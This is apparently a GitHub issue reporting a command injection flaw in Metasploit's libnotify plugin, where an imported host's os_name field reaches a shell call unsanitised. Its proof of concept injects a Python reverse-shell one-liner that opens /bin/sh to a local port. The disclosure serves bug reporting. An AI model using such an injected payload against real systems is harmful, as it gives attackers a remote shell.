You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
the plugin libnotify has a command injection vulnerability which could be triggered when the client imports info as hostnames or services specially crafted from another tool
The impact is low because is not possible to tamper the hostname when the client runs a scan with nmap for example
Now if we import the hosts' info from another tool (as faraday, openvas or nessus) and we don't have limitations in the hostname field, the importer plugin will run our field without sanitizing
the plugin will run something similar to:
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> db.find_or_create_host(:workspace => 'pepe', :host => '192.168.6.16', :state => Msf::HostState::Alive, :os_name => 'BEGIN\'; python -c \'import socket
,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.f
ileno(),2);p=subprocess.call(["/bin/sh","-i"])')
in this case, I made a little PoC running a reverse shell in another port
the impact is really low because tools as nmap filter the hostname based on the fingerprint of the OS so is not easy to trigger the bug in a scan for example, but in a plugin importer could be fit
The text was updated successfully, but these errors were encountered:
the plugin libnotify has a command injection vulnerability which could be triggered when the client imports info as hostnames or services specially crafted from another tool
The impact is low because is not possible to tamper the hostname when the client runs a scan with nmap for example
in the libnotify's callback of db_host:
if we could tamper the field os_name, this data lands in a call to system in notify-send in order to display the notification
Steps to reproduce
How'd you do it?
the plugin will run something similar to:
in this case, I made a little PoC running a reverse shell in another port
the impact is really low because tools as nmap filter the hostname based on the fingerprint of the OS so is not easy to trigger the bug in a scan for example, but in a plugin importer could be fit
The text was updated successfully, but these errors were encountered: